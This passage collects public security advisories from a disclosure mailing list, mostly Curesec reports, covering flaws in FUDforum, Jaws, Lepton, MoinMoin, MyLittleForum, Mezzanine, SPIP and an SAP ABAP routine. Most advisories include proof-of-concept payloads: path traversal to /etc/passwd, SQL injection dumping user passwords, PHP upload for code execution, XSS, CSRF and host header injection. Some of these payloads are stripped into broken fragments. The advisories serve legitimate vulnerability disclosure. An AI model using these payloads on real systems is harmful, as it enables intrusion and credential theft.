P_FLEN variable in hex format.

Vulnerable code

426. p_flen = 0.

427. DO.

428.READ DATASET p_ifilea INTO lw.

429.* Exit conditions for accessing in a loop

430.IF sy-subrc NE 0. EXIT. ENDIF.

431.APPEND lw TO p_itab .

432.

433.p_flen = p_flen + XSTRLEN( lw-d ) .

434. ENDDO.

8. REPORT TIMELINE

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

9. REFERENCES

https://erpscan.com/advisories/erpscan-16-031-sap-netweaver-abap-directory-traversal-via-using-read-dataset/

10. ABOUT ERPScan Research

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them, there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

11. ABOUT ERPScan

[FD] FUDforum 3.0.6: LFI

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:FUDforum 3.0.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://fudforum.org/forum/
Vulnerability Type:  LFI
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to local file inclusion. This allows an attacker to read arbitrary files that
the web user has access to.

Admin credentials are required.

3. Details

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description: The "file" parameter of the hlplist.php script is vulnerable to
directory traversal, which allows the viewing of arbitrary files.

Proof of Concept:

http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=
4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Jaws 1.1.1: Object Injection, Open Redirect, Cookie Flags

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Jaws 1.1.1
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://jaws-project.com/
Vulnerability Type: Object Injection, Open Redirect, Cookie Flags
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to various low to medium impact issues. It contains an Object
Injection, which does not seem to be currently exploitable without custom
changes made by users; its session cookies are not set to httpOnly, which may
make it easier to exploit XSS issues; and it contains an Open Redirect issue.

3. Details

Open Redirect / Phishing

After a login is performed, a user is redirected to a website defined in the
URL, which may be exploited in phishing attacks.

Note that the redirect only works if the user was not logged in previously, and
then only after a login is performed.

Proof of Concept:

http://localhost/jaws-complete-1.1.1/index.php/users/login/referrer/
687474703a2f2f6578616d706c652e636f6d.html 687474703a2f2f6578616d706c652e636f6d
is the result of a hex2bin call.

Object Injection

All parameters passed to the application are passed to unserialize, making the
application vulnerable to Object Injection.

Currently, there does not seem to be code that can be exploited via Object
Injection, but this may change in the future, or users may have custom code
which isn't in itself vulnerable, but would result in vulnerable code in
combination with this issue.

Proof of Concept:

All values passed to the application are vulnerable, for example a cookie: GET
/jaws-complete-1.1.1/admin.php?checksess HTTP/1.1 Host: localhost
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
JAWSSESSID=O:{}; Connection: close Cache-Control: max-age=0

Cookie Flags

The JAWSSESSID cookie does not have the httpOnly flag set, making it slightly
easier to exploit XSS vulnerabilities.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Object-Injection-Open-Redirect-Cookie-Flags-168.html

--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:FUDforum 3.0.6
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: XSS, Login CSRF
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in private messages is vulnerable
to persistent XSS.

Proof of Concept:

Send a PM to a user. Add an attachment, where the filename is: '">.jpg When the recipient views the PM, the injected code will
be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.

Proof of Concept:

Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be
executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.

Proof of Concept:

Visit http://localhost/fudforum/index.php?t=register as signature, use '"> The injected code is either executed
when the user themselves edits their profile - which may be exploited via login
CSRF - or when an admin visits the edit profile page located here: http://
localhost/fudforum/index.php?t=register&mod_id=6&&SQ=
1a85a858f326ec6602cb6d78d698f60a

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The login of FUDForum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.

Proof of Concept:

http://localhost/fudforum/index.php?t=login"; method
="POST">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html

--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Jaws 1.1.1: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Jaws 1.1.1
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://jaws-project.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to code execution as it allows the upload of files with a dangerous
type.

An account with extended privileges is required.

3. Details

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file manager forbids the uploading of most PHP and htaccess files by
checking the extension of uploaded files and renaming files when required.

However, the check can be bypassed by an attacker as the file extension .pht -
which is treated as PHP file by default Apache installations - is not filtered.

An account with access to the file manager is required.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Code-Execution-170.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Lepton 2.2.2: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   LEPTON 2.2.2 stable
Fixed in:   2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/
important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to11/10/2016
public:
Release mode:   Coordinated Release
CVE:n/a
Credits Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files with dangerous
type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=
099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid=
8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data;
boundary=---38397165016927337851258279296
Content-Length: 613 -38397165016927337851258279296
Content-Disposition: form-data; name="action" media_upload
-38397165016927337851258279296 Content-Disposition:
form-data; name="current_dir"
-38397165016927337851258279296 Content-Disposition:
form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png http://localhost/
LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version http://www.lepton-cms.org/posts/
Link: important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection &
Type: Password Handling
RemoteYes
Exploitable:
Reported to 09/05/2016
vendor:
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it
contains various low to medium impact issues. The functionality that operates
on files and folders is vulnerable to CSRF which may lead to XSS, the logout is
vulnerable to Open Redirect, the in-build bruteforce protection can be easily
bypassed, and passwords are hashed with md5 and send out via email in
plaintext.

3. Details

CSRF

CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description: All actions on folders and files are missing CSRF protection.
Because of this, an attacker can delete, create, or rename folders and files.
An attacker could for example create .html files which would lead to an XSS
attack.

Proof of Concept:

Delete Folder: http://localhost//
LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?
action=delete_folder" method="POST"> Create File:
http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/
tiny_mce/filemanager/execute.php?action=create_file" method="POST">

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP

Description: The redirect parameter of the logout script is vulnerable to open
redirect.

Proof of Concept:

http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://
google.com

Insufficient Bruteforce Protection

Description: The bruteforce protection works on a per-session base, which is
easily bypassed by an attacker by simply requesting a new session by not
sending the current, locked session information. The current bruteforce
protection may provide a false sense of security and should thus be removed or
changed.

Code:

if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }

Password Handling

The password reset functionality sends a newly generated password in plaintext
via email, which is not recommended.

Additionally, md5 is used for hashing, which is also not recommended.

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html

--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Lepton 2.2.2: SQL Injection

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   LEPTON 2.2.2 stable
Fixed in:   2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/
important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to11/10/2016
public:
Release mode:   Coordinated Release
CVE:n/a
Credits Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=
3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 154 search_scope=title&terms=" union select
username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=
dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()&
visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&
leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=
f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool=
droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute=
'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&
Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&
Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MoinMoin 1.9.8: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:MoinMoin 1.9.8
Fixed in:1.9.9
Fixed Version Link:  http://static.moinmo.in/files/moin-1.9.9.tar.gz
Vendor Website:  https://moinmo.in
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:Coordinated Release
CVE: CVE-2016-7148, CVE-2016-7146
Credits  Tim Coen of Curesec GmbH

2. Overview

MoinMoin is an open source Wiki application written in python. In version
1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker
to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS (CVE-2016-7148)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: A page name is echoed in the attach file page without encoding,
leading to persistent XSS.

Proof of Concept:

To place the payload create a new page which contains the payload as name by
visiting: http://localhost:9090/
newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit To
trigger the payload visit the attach file page: http://localhost:9090/
newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile
Note that there must be at least one existing attachment.

XSS 2: Persistent XSS (CVE-2016-7146)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The GUI editor is vulnerable to XSS via a specifically crafted
URL, as it echoes part of the URL without encoding in two different places. The
issue can be exploited reflected or persistent.

Proof of Concept:

Reflected example (the page does not have to exist): http://localhost:9090/'">
?action=fckdialog&dialog=attachment Alternatively,
an attacker can create a page containing the payload: http://localhost:9090/
newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E The payload is triggered
when attaching a file via the the GUI editor ("Edit (GUI)" -> "Attachment").

4. Solution

To mitigate this issue please upgrade at least to version 1.9.9:

http://static.moinmo.in/files/moin-1.9.9.tar.gz

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs
09/06/2016 CVEs assigned and distributed to vendor
10/05/2016 Vendor requests more time
10/31/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MoinMoin-198-XSS-175.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MyLittleForum 2.3.6.1: CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   MyLittleForum 2.3.6.1
Fixed in:   2.3.7beta
Fixed Version Link: https://github.com/ilosuna/mylittleforum/releases/tag/
v2.3.7beta
Vendor Website: http://mylittleforum.net/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to11/10/2016
public:
Release mode:   Coordinated Release
CVE:n/a
Credits Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is
vulnerable to cross site request forgery. An attacker could exploit this issue
to add new users or change the status of existing users to administrator if a
victim visits a website containing a specifically crafted payload while logged
into MyLittleForum.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description: There is no CSRF protection, allowing an attacker to perform
actions for a victim if the victim visits an attacker controlled website while
logged in.

Proof of Concept:

Add New User:   http://localhost/
mylittleforum-2.3.6.1/index.php" method="POST">   Make Existing User Admin: 

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-CSRF-176.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Mezzanine 4.2.0: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Mezzanine 4.2.0
Fixed in:4.2.1
Fixed Version Link:  https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website:  http://mezzanine.jupo.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges, the other one does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment, as author name use '"> To trigger
the payload, view the comment overview in the admin backend: http://
localhost:8000/admin/generic/threadedcomment

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file: http://localhost:8000/admin/
media-library/upload/?ot=desc&o=date As uploaded files are stored inside the
web root, it can now be accessed, thus executing the JavaScript code it
contains: http://localhost:8000/static/media/uploads/xss.html

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:

https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SPIP 3.1: XSS & Host Header Injection

Security Advisory - Curesec Research Team

1. Introduction

Affected SPIP 3.1
Product:
Fixed in:3.1.2 / 3.0.23
Fixed Versionhttp://www.spip.net/en_download
Link:
Vendor Website: http://www.spip.net/
VulnerabilityReflected & Persistent XSS, Host Header Injection, httpOnly
Type:Cookie disclosure
Remote Yes
Exploitable:
Reported to 09/05/2016
vendor:
Disclosed to 11/10/2016
public:
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

SPIP is a content management system written in PHP. In version 3.1, it is
vulnerable to a persistent as well as reflected cross site scripting
vulnerability as it allows users to enter URLs containing the JavaScript
protocol, which an attacker can exploit to steal cookies, inject JavaScript
keylogger, or bypass CSRF protection. Additionally, it contains a Host Header
Injection which may lead to the leakage of password reset tokens and thus the
compromisation of user accounts. Finally, the application discloses httpOnly
cookies, making exploitation of XSS issues slightly easier.

3. Details

Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: When posting a message in the internal Forum, user input is
properly encoded, thus disallowing XSS. However, a hypertext link may be added
as well, and there is no check on the protocol of the supplied link, which
leads to an XSS vulnerability.

Proof of Concept:

1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new
2. In the URL field enter: javascript:alert(1) 3. Post the Message To trigger
the payload, a click on the link is required.

Reflected XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: When editing a private message, a redirect parameter may be
submitted as well. This parameter decides to what page a user is returned if
they were to press the back button. The value of this parameter is user
controlled and may thus be used for phishing or XSS attacks.

Proof of Concept:

Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect=
javascript:alert(1) Click on the Back button represented by the envelope icon.

Host Header Injection

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N

Description:
The application takes the Host Header and uses it in a password reset email. As
the Host Header is user-controlled, an attacker can set it to arbitrary values.

In the case of a password reset page, this can lead to security issues as an
attacker can request a password reset email for a user and set the Host header
to a server they control. As this header is used in the email, a user would be
send to the attackers server if they were to click on the link, leading to the
leakage of the recovery token and thus the compromisation of the account.

Proof of Concept:

Request: POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1 Host: example.com
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6;
wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2
Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/
x-www-form-urlencoded Content-Length: 199 page=spip_pass&lang=en&
formulaire_action=oubli&formulaire_action_args=
orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk
&oubli=visitor%40example.com&nobot= Email Send: [My SPIP site] Forgotten
password (this is an automated message) To recover your access to the site My
SPIP site (http://localhost/spip) Please go to the following address: http://
example.com/spip/spip.php?page=spip_pass&p=107017475657c15ad6e9c781.23674073
You can then enter a new password and log in to the site.

httpOnly Cookie Disclosure

Description: The phpinfo page discloses httpOnly cookies such as session
cookies, making it slightly easier to exploit XSS vulnerabilities.

Proof of Concept:

http://localhost/spip/ecrire/?exec=info

4. Solution

To mitigate this issue please upgrade at least to version 3.1.2:

http://www.spip.net/en_download

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/23/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/SPIP-31-XSS-amp-Host-Header-Injection-178.html

--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MyLittleForum 2.3.6.1: XSS & RPO

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   MyLittleForum 2.3.6.1
Fixed in:   2.3.7beta
Fixed Version Link: https://github.com/ilosuna/mylittleforum/releases/tag/
v2.3.7beta
Vendor Website: http://mylittleforum.net/
Vulnerability Type: XSS & RPO
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to11/10/2016
public:
Release mode:   Coordinated Release
CVE:n/a
Credits Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is
vulnerable to reflected cross site scripting as well as relative path
overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or
bypass CSRF protection, and RPO may lead to CSS injection.

3. Details

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The username and email parameter of the add user page are
